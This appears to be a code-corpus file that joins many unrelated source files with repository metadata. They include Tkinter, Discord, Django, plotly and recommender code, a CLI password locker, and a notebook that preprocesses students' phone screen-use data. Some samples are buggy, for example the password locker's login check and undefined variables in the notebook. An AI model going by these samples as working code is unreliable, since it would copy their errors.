Tk.Label(f2, text=":תזמון עדכון יומי", font=FONT).grid(row=8)
f3 = Tk.Frame(f1, height='42')
hourstr = Tk.StringVar(root, '00')
minstr = Tk.StringVar(root, '00')
secstr = Tk.StringVar(root, '00')
Tk.Spinbox(f3, from_=00, to=23, wrap=True, textvariable=hourstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.2, rely=.5)
Tk.Label(f3, text=':', font=FONT2).place(in_=f3, anchor="c", relx=.35, rely=.5)
Tk.Spinbox(f3, from_=00, to=59, wrap=True, textvariable=minstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.5, rely=.5)
Tk.Label(f3, text=':', font=FONT2).place(in_=f3, anchor="c", relx=.65, rely=.5)
Tk.Spinbox(f3, from_=00, to=59, wrap=True, textvariable=secstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.8, rely=.5)
f3.grid(row=8, sticky="nsew")
Tk.Button(f1, text="תזמן", command=lambda: schedule(hourstr.get(), minstr.get(), secstr.get())).grid(row=10)
f4 = Tk.Frame(f2, height='50')
Tk.Label(f4, text="חישוב מצטבר *").pack(side="right")
Tk.Label(f4, font=FONT2).pack()
f4.grid(row=9, sticky="nsew")
f1.grid(row=0, column=0)
f2.grid(row=0, column=1)
Tk.mainloop()
def schedule(hours, minutes, seconds):
schedule_time = ''
if int(hours) < 10:
schedule_time += f'0{hours}:'
else:
schedule_time += f'{hours}:'
if int(minutes) < 10:
schedule_time += f'0{minutes}:'
else:
schedule_time += f'{minutes}:'
if int(seconds) < 10:
schedule_time += f'0{seconds}'
else:
schedule_time += f'{seconds}'
file_path = str(os.path.abspath(__file__))[:-2]+'exe'
os.system(f'SchTasks /Create /SC DAILY /TN "corona" /TR "{file_path}" /ST {schedule_time}')
def what_color(color):
try:
colors = {"ירוק": "green", "אדום": "red", "כתום": "orange", "צהוב": "yellow"}
label_color = colors[color]
except:
label_color = "black"
return label_color
if __name__ == "__main__":
main()
| 3.203125
| 3
|
cogs/preferences.py
|
MiningMark48/Tidal-Bot
| 6
|
12784836
|
from discord.ext import commands
from util.data.user_data import UserData
from util.decorators import delete_original
class Preferences(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name="botdms", aliases=["botdm"])
@commands.cooldown(1, 2, commands.BucketType.user)
@delete_original()
async def dms(self, ctx, *, enabled: bool):
"""
Control whether or not the bot will DM you with certain commands/functions.
Example: Disabling DMs will prevent bot from DMing reactor role gives/takes.
Usage: botdms False
"""
result = UserData(str(ctx.author.id)).booleans.set("dm_enabled", enabled)
await ctx.send(f"{ctx.author.mention}, bot DMs have been **{'enabled' if result else 'disabled'}**.",
delete_after=10)
def setup(bot):
bot.add_cog(Preferences(bot))
| 2.390625
| 2
|
easy/swap_case.py
|
Amin-Abouee/code_eval
| 0
|
12784837
|
import sys
with open(sys.argv[1],'r') as test_cases:
for test in test_cases:
res = ''
for s in test:
if s.islower():
res += str(s.upper())
elif s.isupper():
res += str(s.lower())
else:
res += str(s)
print res,
| 3.59375
| 4
|
HumanRace/calc.py
|
InamdarAbid/PythonTutorial
| 1
|
12784838
|
<gh_stars>1-10
def human_age(age):
if age < 18:
return "Human is child"
elif age < 60:
return "Human is adult"
else:
return "Human is old."
def area(side):
are = side ** 2
return f'Area of square is {are}'
| 3.625
| 4
|
run.py
|
fkinyae/passwordLocker
| 0
|
12784839
|
<gh_stars>0
#!/usr/bin/env python3.9
from credential import Credential
from user import User
def create_new_user(username, password):
'''
Function that creates a user
'''
new_user = User(username, password)
return new_user
def save_user(user):
'''
function to save user
'''
user.save_user()
def del_user(user):
'''
Function that deletes a user
'''
user.delete_user()
def user_login(username, password):
'''
check user authentication
'''
authentic_user = User.authenticate_user(username, password)
return authentic_user
def save_credential(credential):
'''
Function to save credential
'''
credential.save_credential()
def delete_credential(credential):
'''
Function to delete credential
'''
credential.delete_credential()
def find_a_credential(account):
'''
Function that searches for credentials
'''
return Credential.find_by_account(account)
def check_credential_existence(account):
'''
Function that checks the existence of a credential
'''
return Credential.find_credential(account)
def display_my_credentials():
'''
Function to display my credentials
'''
return Credential.display_credentials()
def generate_password():
'''
generates random passwords
'''
get_password = User.gen_password(8)
return get_password
def main():
password = None
print("Hi.. Welcome to Password Locker your modern passwords store! What is your name? ")
name = input()
print('\n')
while True:
print(f"Hello { name},\n Use the following short codes to perform your operation:\n CA - create a new user account, \n LG - login to your user account ")
short_code = input("").lower().strip()
if short_code == "ca":
print("Create An Account")
print('*' * 50)
username = input("Username: ")
while True:
print(" \n TP - To input your own password: \n GP - To get an autogenerated random password")
my_choice = input().lower().strip()
if my_choice == 'tp':
password = input("Enter Password\n")
break
elif my_choice == 'gp':
password = generate_password()
break
else:
print("We are sorry, that was an invalid choice, Try Again!")
save_user((create_new_user(username,password)))
print("*"*85)
print(f"Hello {name} , Your Account has been created successfully. Your password is: {password}")
print("*"*85)
elif short_code == "lg":
print("*"*50)
print("Enter your username and password to login")
print("*"*50)
username = input("Username: ")
password = input("password: ")
login = user_login(username, password)
if user_login == login:
print(f"Hello {username}.Welcome To PassWord Locker Manager")
print('\n')
while True:
print("Use these shortcodes:\n CC - Create a new credential \n DC - Display Credentials \n FC - Find a credential \n GP - Generate a random password \n D-Delete credential \n EX - Exit the application")
short_code = input().lower().strip()
if short_code == "cc":
print("Create New Credential")
print("."*20)
print("Account Name: ")
account = input().lower()
print("Your account username")
username = input()
while True:
print(" \n TP - To input your own password: \n GP - To get an autogenerated random password")
the_choice = input().lower().strip()
if the_choice == 'tp':
password = input("Enter Your password\n")
break
elif the_choice == 'gp':
password = generate_password()
else:
print("Invalid entry, try again")
save_user((create_new_user(username,password)))
print('\n')
print(f"Account Credential for: {account} - UserName: {username} - Password:{password} created succesfully")
print('\n')
elif short_code == "dc":
if display_my_credentials():
print("Here is your list of accounts: ")
print("*"* 30)
print('_'*30)
for account in display_my_credentials():
print(f"Account:{account.account} \n Username:{username}\n Password:{password}")
print('_'* 30)
print('*' * 30)
else:
print("You don't have any credentials saved yet..........")
elif short_code == "fc":
print("Enter the Account name you want to search for ")
search_name = input().lower()
if find_a_credential(search_name):
search_credential = find_a_credential(search_name)
print(f"Account : {search_credential.account}")
print('-' * 50)
print(f"Username: {search_credential.username} Password :{search_credential.password}")
print('-' * 50)
else:
print("That Credential does not exist")
print('\n')
elif short_code == "d":
print("Enter the account name of the Credentials you want to delete")
cred_name = input().lower()
if find_a_credential(cred_name):
search_cred = find_a_credential(cred_name)
print("_"*50)
search_cred.delete_credential()
print('\n')
print(f"Your stored credentials for : {search_cred.account} successfully deleted!!!")
print('\n')
else:
print("That Credential you want to delete does not exist in your store yet")
elif short_code == 'gp':
password = generate_password()
print(f" {password} Has been generated succesfull. You can proceed to use it to your account")
elif short_code == 'ex':
print("Thanks for using passwords store manager.. See you next time!")
break
else:
print("Wrong entry... Check your entry again and let it match those in the menu")
else:
print("Please enter a valid input to continue")
if __name__ == '__main__':
main()
| 4.28125
| 4
|
plots.py
|
martinaviggiano/textsent_project
| 0
|
12784840
|
import plotly.graph_objects as go
from plotly.subplots import make_subplots
def plot_freq_labels(data, template="plotly"):
X = ["Non Hate Speech", "Hate Speech"]
Y = data["label"].value_counts().values
fig = go.Figure()
fig.add_trace(
go.Bar(
x=X,
y=Y,
text=Y,
textposition="auto",
marker_color=["lightblue", "royalblue"],
hovertemplate="Label: %{x} <br>Count: %{y}",
)
)
fig.update_layout(
title="Labels frequency",
xaxis_title="Labels",
yaxis_title="Counts",
template=template,
)
return fig
def plot_word_hist(data, template="plotly"):
fig = go.Figure()
fig.add_trace(
go.Histogram(
x=data.word_count_before.values,
marker_color="royalblue",
name="Before cleaning",
)
)
fig.add_trace(
go.Histogram(
x=data.word_count.values,
marker_color="lightblue",
name="After cleaning",
)
)
fig.update_layout(
title="Words distribution",
xaxis_title="Number of words",
yaxis_title="Number of sentences",
barmode="stack",
template=template,
)
fig.update_xaxes(range=[0, 50])
return fig
def plot_most_common_words(df, template="plotly"):
X = df.words
Y = df.freq
fig = go.Figure()
fig.add_trace(
go.Bar(
x=X,
y=Y,
hovertemplate="Word: %{x} <br>Count: %{y}",
marker_color="royalblue",
)
)
fig.update_layout(
title="Top 20 most common Words in the entire dataset ",
xaxis_title="Word",
yaxis_title="Count",
xaxis_tickangle=290,
template=template,
)
return fig
def plot_top_20_pos(df, x_col="", title="", template="plotly"):
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Bar(
x=df[x_col],
y=df.Freq_No_Hate,
name="Freq. Not Hate Speech",
yaxis="y",
offsetgroup=1,
marker_color="lightblue",
),
secondary_y=False,
)
fig.add_trace(
go.Bar(
x=df[x_col],
y=df.Freq_Hate_Speech,
name="Freq. Hate Speech",
yaxis="y2",
offsetgroup=2,
marker_color="royalblue",
),
secondary_y=True,
)
fig.update_xaxes(title_text=x_col, tickangle = 290)
fig.update_yaxes(title_text="Count", secondary_y=False)
fig.update_layout(
title=title, template=template, yaxis2=dict(overlaying="y", side="right")
)
fig.update_layout(barmode="group")
return fig
def plot_top_pos_general(df, x_col=None, y_col=None, title="", template="plotly"):
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Bar(
x=df[x_col[0]],
y=df[y_col[0]],
name=x_col[0],
yaxis="y",
offsetgroup=1,
marker_color="lightblue",
hovertemplate="<b>Total</b><br>POS: %{x} <br>Rel. freq.: %{y}",
),
secondary_y=False,
)
fig.add_trace(
go.Bar(
x=df[x_col[1]],
y=df[y_col[1]],
name=x_col[1],
yaxis="y2",
offsetgroup=2,
marker_color="royalblue",
hovertemplate="<b>Hate Speech</b><br>POS: %{x} <br>Rel. freq.: %{y}",
),
secondary_y=True,
)
fig.update_xaxes(title_text="POS", tickangle=290)
fig.update_yaxes(title_text="Relative Frequency", secondary_y=False)
fig.update_layout(
title=title, template=template, yaxis2=dict(overlaying="y", side="right")
)
fig.update_layout(barmode="group")
return fig
| 2.828125
| 3
|
src/Bubot/OcfResource/OcfResource.py
|
businka/bubot_Core
| 0
|
12784841
|
from Bubot.Helpers.ExtException import ExtException, KeyNotFound
from Bubot_CoAP.resources.resource import Resource
class OcfResource(Resource):
def __init__(self, name, coap_server=None, visible=True, observable=True, allow_children=True):
super().__init__(name, coap_server=None, visible=True, observable=True, allow_children=True)
self._data = {}
self._href = name
self.actual_content_type = "application/vnd.ocf+cbor"
self.content_type = "application/vnd.ocf+cbor"
self.device = None
pass
@classmethod
def init_from_config(cls, device, href, config):
self = cls(href)
self.device = device
self.data = config
return self
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
@property
def payload(self):
return self._data
# @payload.setter
# def payload(self, value):
# self._data = value
def get_attr(self, *args):
try:
return self.data[args[0]]
except KeyError:
try:
return args[1]
except IndexError:
raise KeyNotFound(
action='OcfDevice.get_param',
detail=f'{args[0]} ({self.__class__.__name__}{self._href})'
) from None
def set_attr(self, name, value):
self.data[name] = value
@property
def resource_type(self):
return self._data.get('rt', [])
@property
def interface_type(self):
return self._data.get('if', [])
def get_link(self, request_address):
return {
'anchor': f'ocf://{self.device.get_device_id()}',
'href': self._href,
'eps': self.device.transport_layer.get_eps(request_address[0] if request_address else None),
'rt': self.get_attr('rt', []),
'if': self.get_attr('if', []),
'n': self.get_attr('n', ''),
'p': self.get_attr('p', dict(bm=0)),
}
async def render_GET(self, request):
self.device.log.debug(
f'{self.__class__.__name__} get {self._href} {request.query} from {request.source} to {request.destination} ')
return self
| 2.125
| 2
|
blog/views.py
|
pavanasri-nyros/blog-app-pavana
| 0
|
12784842
|
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post
from django.views.generic import ListView, DetailView
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
class HomePageView(ListView):
model = Post
template_name = 'home.html'
paginate_by = 4
class PostDetailView(LoginRequiredMixin, DetailView):
login_url = '/login/'
model = Post
template_name = 'post_detail.html'
def AboutPageView(request):
return render(request, 'about.html')
@login_required
def ContactPageView(request):
return render(request, 'contact.html')
def signupuser(request):
if request.method == 'GET':
return render(request, 'signupuser.html', {'form': UserCreationForm()})
else:
#create a new user
if request.POST['password1'] == request.POST['password2']:
try:
user = User.objects.create_user(request.POST['username'], password = request.POST['password1'])
user.save()
login(request, user)
return redirect('home')
except IntegrityError:
return render(request, 'signupuser.html',{'forms':UserCreationForm(),'error':"That user name has been taken. Please try someother username"})
else:
return render(request, 'signupuser.html',{'forms':UserCreationForm(), 'error':'password did not match'})
def loginuser(request):
if request.method == 'GET':
return render(request, 'loginuser.html', {'form':AuthenticationForm()})
else:
user = authenticate(request,username = request.POST['username'],password = request.POST['password'])
if user is None:
return render(request, 'loginuser.html', {'form':AuthenticationForm,'error':'Username and password did not match'})
else:
login(request,user)
return redirect('home')
@login_required
def logoutuser(request):
if request.method == "POST":
logout(request)
return redirect('home')
| 2.34375
| 2
|
irspack/utils/id_mapping.py
|
Random1992/irspack
| 0
|
12784843
|
from typing import (
TYPE_CHECKING,
Any,
Dict,
Iterable,
List,
Optional,
Sequence,
Tuple,
Union,
)
import numpy as np
import scipy.sparse as sps
from irspack.definitions import DenseScoreArray, UserIndexArray
from irspack.utils._util_cpp import retrieve_recommend_from_score
from irspack.utils.threading import get_n_threads
if TYPE_CHECKING:
# We should move this module out of "utils".
from irspack.recommenders import BaseRecommender
class IDMappedRecommender:
"""A utility class that helps mapping user/item ids to index, retrieving recommendation score,
and making a recommendation.
Args:
recommender:
The backend base recommender which transforms user/item ids.
user_ids:
user_ids which correspods to the rows of ``recommender.X_train_all``.
item_ids:
item_ids which correspods to the columns of ``recommender.X_train_all``.
Raises:
ValueError: When recommender and user_ids/item_ids are inconsistent.
ValueError: When there is a duplicate in user_ids.
ValueError: When there is a duplicate in item_ids.
"""
def __init__(
self, recommender: "BaseRecommender", user_ids: List[Any], item_ids: List[Any]
):
if (recommender.n_users != len(user_ids)) or (
recommender.n_items != len(item_ids)
):
raise ValueError(
"The recommender and user/item ids have inconsistent lengths."
)
self.recommender = recommender
self.user_ids = user_ids
self.item_ids = item_ids
self.user_id_to_index = {user_id: i for i, user_id in enumerate(user_ids)}
self.item_id_to_index = {item_id: i for i, item_id in enumerate(item_ids)}
def _item_id_list_to_index_list(self, ids: Iterable[Any]) -> List[int]:
return [self.item_id_to_index[id] for id in ids if id in self.item_id_to_index]
def _user_profile_to_data_col(
self, profile: Union[List[Any], Dict[Any, float]]
) -> Tuple[List[float], List[int]]:
data: List[float]
cols: List[int]
# data: np.ndarray
if isinstance(profile, list):
cols = self._item_id_list_to_index_list(profile)
data = [1.0] * len(cols)
else:
data = []
cols = []
for id, score in profile.items():
if id in self.item_id_to_index:
data.append(score)
cols.append(self.item_id_to_index[id])
return data, cols
def _list_of_user_profile_to_matrix(
self, users_info: Sequence[Union[List[Any], Dict[Any, float]]]
) -> sps.csr_matrix:
data: List[float] = []
indptr: List[int] = [0]
col: List[int] = []
indptr_current = 0
for user_info in users_info:
data_u, col_u = self._user_profile_to_data_col(user_info)
data.extend(data_u)
col.extend(col_u)
indptr_current += len(col_u)
indptr.append(indptr_current)
result = sps.csr_matrix(
(data, col, indptr), shape=(len(users_info), len(self.item_ids))
)
return result
def get_recommendation_for_known_user_id(
self,
user_id: Any,
cutoff: int = 20,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
"""Retrieve recommendation result for a known user.
Args:
user_id:
The target user ID.
cutoff:
Maximal number of recommendations allowed.
allowed_item_ids:
If not ``None``, recommend the items within this list.
If ``None``, all known item ids can be recommended (except for those in ``item_ids`` argument).
Defaults to ``None``.
forbidden_item_ids:
If not ``None``, never recommend the items within the list. Defaults to None.
Raises:
RuntimeError: When user_id is not in ``self.user_ids``.
Returns:
A List of tuples consisting of ``(item_id, score)``.
"""
if user_id not in self.user_ids:
raise RuntimeError(f"User with user_id {user_id} not found.")
user_index: UserIndexArray = np.asarray(
[self.user_id_to_index[user_id]], dtype=np.int64
)
score = self.recommender.get_score_remove_seen(user_index)[0, :]
return self._score_to_recommended_items(
score,
cutoff=cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
)
def get_recommendation_for_new_user(
self,
user_profile: Union[List[Any], Dict[Any, float]],
cutoff: int = 20,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
"""Retrieve recommendation result for a previously unseen user using item ids with which he or she interacted.
Args:
user_profile:
User's profile given either as a list of item ids the user had a cotact or a item id-rating dict.
Previously unseen item ID will be ignored.
cutoff:
Maximal number of recommendations allowed.
allowed_item_ids:
If not ``None``, recommend the items within this list.
If ``None``, all known item ids can be recommended (except for those in ``item_ids`` argument).
Defaults to ``None``.
forbidden_item_ids:
If not ``None``, never recommend the items within the list. Defaults to None.
Returns:
A List of tuples consisting of ``(item_id, score)``.
"""
data, cols = self._user_profile_to_data_col(user_profile)
X_input = sps.csr_matrix(
(data, cols, [0, len(cols)]), shape=(1, len(self.item_ids))
)
score = self.recommender.get_score_cold_user_remove_seen(X_input)[0]
return self._score_to_recommended_items(
score,
cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
)
def get_recommendation_for_new_user_batch(
self,
user_profiles: Sequence[Union[List[Any], Dict[Any, float]]],
cutoff: int = 20,
allowed_item_ids: Optional[List[List[Any]]] = None,
forbidden_item_ids: Optional[List[List[Any]]] = None,
n_threads: Optional[int] = None,
) -> List[List[Tuple[Any, float]]]:
"""Retrieve recommendation result for a previously unseen users using item ids with which they have interacted.
Args:
user_profiles:
A list of user profiles.
Each profile should be either the item ids the user had a cotact, or item-rating dict.
Previously unseen item IDs will be ignored.
cutoff:
Maximal number of recommendations allowed.
allowed_item_ids:
If not ``None``, defines "a list of list of recommendable item IDs"
and ``len(allowed_item_ids)`` must be equal to ``len(item_ids)``.
Defaults to ``None``.
forbidden_item_ids:
If not ``None``, defines "a list of list of forbidden item IDs"
and ``len(allowed_item_ids)`` must be equal to ``len(item_ids)``
Defaults to ``None``.
Returns:
A list of list of tuples consisting of ``(item_id, score)``.
Each internal list corresponds to the recommender's recommendation output.
"""
X_input = self._list_of_user_profile_to_matrix(user_profiles)
score = self.recommender.get_score_cold_user_remove_seen(X_input)
return self._score_to_recommended_items_batch(
score,
cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
n_threads=get_n_threads(n_threads=n_threads),
)
def _score_to_recommended_items(
self,
score: DenseScoreArray,
cutoff: int,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
if allowed_item_ids is not None:
allowed_item_indices = np.asarray(
self._item_id_list_to_index_list(allowed_item_ids), dtype=np.int64
)
high_score_inds = allowed_item_indices[
score[allowed_item_indices].argsort()[::-1]
]
else:
high_score_inds = score.argsort()[::-1]
recommendations: List[Tuple[Any, float]] = []
for i in high_score_inds:
i_int = int(i)
score_this = score[i_int]
item_id = self.item_ids[i_int]
if np.isinf(score_this):
continue
if forbidden_item_ids is not None:
if item_id in forbidden_item_ids:
continue
recommendations.append((item_id, float(score_this)))
if len(recommendations) >= cutoff:
break
return recommendations
def _score_to_recommended_items_batch(
self,
score: DenseScoreArray,
cutoff: int,
allowed_item_ids: Optional[List[List[Any]]] = None,
forbidden_item_ids: Optional[List[List[Any]]] = None,
n_threads: int = 1,
) -> List[List[Tuple[Any, float]]]:
if forbidden_item_ids is not None:
assert len(forbidden_item_ids) == score.shape[0]
if allowed_item_ids is not None:
assert len(allowed_item_ids) == score.shape[0]
allowed_item_indices: List[List[int]] = []
if allowed_item_ids is not None:
allowed_item_indices = [
self._item_id_list_to_index_list(_) for _ in allowed_item_ids
]
if forbidden_item_ids is not None:
for u, forbidden_ids_per_user in enumerate(forbidden_item_ids):
score[
u, self._item_id_list_to_index_list(forbidden_ids_per_user)
] = -np.inf
raw_result = retrieve_recommend_from_score(
score,
allowed_item_indices,
cutoff,
n_threads=n_threads,
)
return [
[
(self.item_ids[item_index], score)
for item_index, score in user_wise_raw_result
]
for user_wise_raw_result in raw_result
]
| 2.109375
| 2
|
src/pyrin/security/session/component.py
|
wilsonGmn/pyrin
| 0
|
12784844
|
# -*- coding: utf-8 -*-
"""
session component module.
"""
from pyrin.application.decorators import component
from pyrin.security.session import SessionPackage
from pyrin.security.session.manager import SessionManager
from pyrin.application.structs import Component
@component(SessionPackage.COMPONENT_NAME)
class SessionComponent(Component, SessionManager):
"""
session component class.
"""
pass
| 1.71875
| 2
|
preprocessing.py
|
AsgerAndersen/ByOurOwnDevices
| 0
|
12784845
|
<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# ## Load libraries
# In[3]:
import os
projpath = 'H:/workdata/705805/'
os.chdir(projpath)
# In[4]:
import pandas as pd
import numpy as np
from datetime import datetime as dt
import cns
# ## Global parameters
# In[5]:
timebin_len = 900
# ## Check the timestamps of the input datasets
# In[6]:
screen = pd.read_csv('data/raw/fixed/external/screen.csv')
invalidation_stamps = pd.read_pickle('data/preproc/behavior/sensor_time.pkl')
# Find the first and last timebin in the entire experiment:
# In[7]:
first_timebin = ((dt(2013,9,day=1) - dt(year=1970,month=1,day=1)).days) * (24 * 60 * 60)
delta = ((dt(2015, 8, day=31, hour=23, minute=59, second=59) - dt(year=1970, month=1, day=1)))
last_timestamp = (delta.days * 24 * 60 * 60 + delta.seconds)
last_timebin = last_timestamp // timebin_len * timebin_len
# Remove the sensor_time timestamps that lie outside the borders defined by the experiment:
# In[10]:
invalidation_stamps_filtered = invalidation_stamps.loc[(invalidation_stamps['timestamp_5m'] >= first_timebin) & (invalidation_stamps['timestamp_5m'] <= last_timebin)]
# Save the updated timestamps to be used for invalidation
# In[11]:
invalidation_stamps_filtered.to_pickle('personal/asger/preprocessed_data/invalidation_stamps_1m.pkl')
# ## Build screen behaviour data set
# Read in the input datasets for this section:
# In[12]:
screen = pd.read_csv('data/raw/fixed/external/screen.csv')
invalidation_stamps = pd.read_pickle('personal/asger/preprocessed_data/invalidation_stamps_1m.pkl')
user_map = pd.read_pickle('data/preproc/users/all_users.pkl').loc[:,['user_idx','user']]
# Prepare the input data sets, so they fit the function that will build the screen behaviour dataset:
# In[16]:
screen = screen.merge(user_map, how = 'left')
screen = screen.drop('user', axis = 1)
invalidation_stamps = invalidation_stamps.rename(columns = {'timestamp_5m': 'timestamp'})
invalidation_stamps = invalidation_stamps[['timestamp', 'user_idx']]
# Build the screen behaviour dataset with the help of the screen_behaviour function. Note that the screen_behaviour function is quite time consuming (it has to run over night). If you want to speed it up, this block of code is very easy to parallelize with ipyparallel. Path to screen_behaviour function: cns/preproc/screen/screen_behaviour.py.
# In[19]:
by_user_screen = [u_df for u,u_df in screen.groupby('user_idx')]
by_user_invalidation = [u_df for u,u_df in invalidation_stamps.groupby('user_idx')]
parsed = [cns.screen_behaviour(screen, invalidation, timebin_len, 3*timebin_length, only_screen_behav = False) for (screen, invalidation) in zip(by_user_screen, by_user_invalidation)]
# In[20]:
invalid_binss = [p[0] for p in parsed]
screen_diffs = [p[1] for p in parsed]
screen_behavs = [p[2] for p in parsed]
n_invs = [p[3] for p in parsed]
invalid_bins = pd.concat(invalid_binss, ignore_index = True)
screen_sessions = pd.concat(screen_diffs, ignore_index = True)
screen_behav = pd.concat(screen_behavs, ignore_index = True)
n_inv = pd.concat(n_invs, ignore_index = True)
# Save the output datasets:
# In[21]:
screen_behav.to_pickle('personal/asger/preprocessed_data/screen_behaviour_1m.pkl')
screen_sessions.to_pickle('personal/asger/preprocessed_data/screen_sessions_1m.pkl')
invalid_bins.to_pickle('personal/asger/preprocessed_data/invalid_bins_1m.pkl')
n_inv.to_pickle('personal/asger/preprocessed_data/invalidation_counts_1m.pkl')
# ## Build screen behaviour in class dataset
# Read in the input datasets for this section:
# In[6]:
screen_behav = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_15m.pkl')
attend = pd.read_pickle('data/preproc/behavior/attendance_geofence.pkl')
temp_map = cns.get_temporal_context_frame()[['hourbin', 'semester']]
# In[10]:
attend['timebin'] = attend['timestamp_qrtr'].astype(int)
attend = attend.drop('timestamp_qrtr', axis=1)
# Split the screen behaviour into two parts: One with all the timebins, where a given user attended class, and one where the user did not:
# In[12]:
def merge_attendance(screen_behav, attend, hourbin_semester_map) :
attend = attend.loc[attend.check_attend == 1, :].copy()
attend = attend.drop_duplicates(subset=['user_idx','timebin'])
attend['hourbin'] = attend['timebin'] // 3600 * 3600
attend = attend.merge(hourbin_semester_map, on = 'hourbin', how = 'left')
attend = attend.drop(['hourbin'], axis = 1)
merged = screen_behav.merge(attend, on = ['user_idx', 'timebin'], how = 'left')
inclass = merged[merged.check_attend == 1].copy().drop('check_attend', axis = 1)
notinclass = merged[merged.check_attend != 1].copy().drop(['check_attend', 'course_number', 'semester'], axis = 1)
return inclass, notinclass
# Change the semester for the second part of the math course that runs over two semesters. Also, add semester to course numbers to make sure that the resulting string is a unique course id:
# In[16]:
def change_sem(row) :
if (row['course_number'] == '01005') :
if (row['semester'] == 'fall_2013') :
return 'spring 2014'
elif (row['semester'] == 'fall_2014') :
return 'spring_2015'
else :
return row['semester']
else :
return row['semester']
# In[17]:
screen_behav_inclass['semester'] = screen_behav_inclass.apply(change_sem, axis = 1)
screen_behav_inclass['course_num_sem'] = screen_behav_inclass['course_number'] + '_' + screen_behav_inclass['semester']
screen_behav_inclass = screen_behav_inclass.drop('course_number', axis = 1)
# In[139]:
screen_behav_inclass['pause_v1'] = (pd.to_datetime(screen_behav_inclass['timebin'],unit='s').dt.minute==45)
screen_behav_inclass['pause_v2'] = (pd.to_datetime(screen_behav_inclass['timebin'],unit='s').dt.minute==0)
# In[140]:
screen_behav_inclass.to_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
screen_behav_notinclass.to_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
# ## Build course attention and performance dataset
# Read in the input datasets for this section:
# In[6]:
screen_behav_inclass = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
grades = pd.read_pickle('data/preproc/dtu/grades_date.pkl')
grades_alt = pd.read_pickle('data/preproc/dtu/grades_alt.pkl')
# Calculate the attention measures:
# In[7]:
attention = screen_behav_inclass.drop(['timebin'], axis = 1) .groupby(['user_idx', 'semester', 'course_num_sem'], as_index = False).mean().drop(['sms','fb_post','pause_v1','pause_v2'],axis=1)
# In[9]:
screen_behav_inclass_nopause_v1 = screen_behav_inclass.loc[~screen_behav_inclass['pause_v1'],['user_idx','course_num_sem','screentime','pause_v1']].copy()
screen_behav_inclass_nopause_v1 = screen_behav_inclass_nopause_v1.drop('pause_v1', axis=1).rename(columns={'screentime':'screentime_nopause_v1'})
attention_nopause_v1 = screen_behav_inclass_nopause_v1.groupby(['user_idx', 'course_num_sem'], as_index = False).mean()
# In[10]:
screen_behav_inclass_nopause_v2 = screen_behav_inclass.loc[~screen_behav_inclass['pause_v2'],['user_idx','course_num_sem','screentime','pause_v2']].copy()
screen_behav_inclass_nopause_v2 = screen_behav_inclass_nopause_v2.drop('pause_v2', axis=1).rename(columns={'screentime':'screentime_nopause_v2'})
attention_nopause_v2 = screen_behav_inclass_nopause_v2.groupby(['user_idx', 'course_num_sem'], as_index = False).mean()
# In[11]:
attention = attention.merge(attention_sms, how='left').merge(attention_nopause_v1, how='left').merge(attention_nopause_v2, how='left')
# In[16]:
grades_alt = grades_alt.dropna(subset=['user_idx', 'class_code'])
# In[19]:
grades_alt['course_number'] = grades_alt.class_code.astype(int).astype(str)
# In[20]:
grades_alt = grades_alt[['course_number', 'user_idx', 'grade', 'semester']]
# In[21]:
counts = screen_behav_inclass[['timebin','user_idx','course_num_sem']] .groupby(['user_idx','course_num_sem'], as_index=False) .count().rename(columns = {'timebin' : 'measurement_count'})
attention = attention.merge(counts, on = ['user_idx','course_num_sem'], how = 'left')
# Filter out observation from the unrelevant semesters and prepare the grades data to be merge:
# In[22]:
relevant_semesters = ['fall_2013','fall_2014','spring_2014','spring_2015']
attention_filt_1 = attention.loc[attention.semester.isin(relevant_semesters), :]
grades['course_num_sem'] = grades['course_number'] + '_' + grades['semester']
grades = grades.loc[grades.user_idx.isin(attention_filt_1.user_idx.unique()), :]
grades = grades.loc[grades.course_num_sem.isin(attention_filt_1.course_num_sem.unique()), :]
grades_alt['course_num_sem'] = grades_alt['course_number'] + '_' + grades_alt['semester']
grades_alt = grades_alt.loc[grades_alt.user_idx.isin(attention_filt_1.user_idx.unique()), :]
grades_alt = grades_alt.loc[grades_alt.course_num_sem.isin(attention_filt_1.course_num_sem.unique()), :]
# In[24]:
grades['grade'] = grades.grade_num_infer.astype(int).astype(str)
# In[27]:
class smart_dic(dict) :
def __missing__(self, key):
return key
grade_map = smart_dic({'00':'0', '02':'2'})
# In[28]:
grades_alt['grade'] = grades_alt.grade.map(grade_map)
# In[29]:
all_grades = pd.concat([grades[['course_num_sem', 'user_idx', 'grade', 'semester']], grades_alt[['course_num_sem', 'user_idx', 'grade', 'semester']]])
# In[30]:
all_grades = all_grades.drop_duplicates()
# In[33]:
def remove_dubs(df) :
if (len(df)==1) :
return (df)
else:
if (df['grade'].isin(['EM', 'BE', 'S', 'IB', 'SN',
'IG']).all()) :
df.sample(1, random_state=1801)
else :
df = df.loc[~(df['grade'].isin(['EM', 'BE', 'S', 'IB', 'SN',
'IG']))]
if (len(df)==1) :
return (df)
else :
df = df.loc[~(df['grade'] == '-3'),]
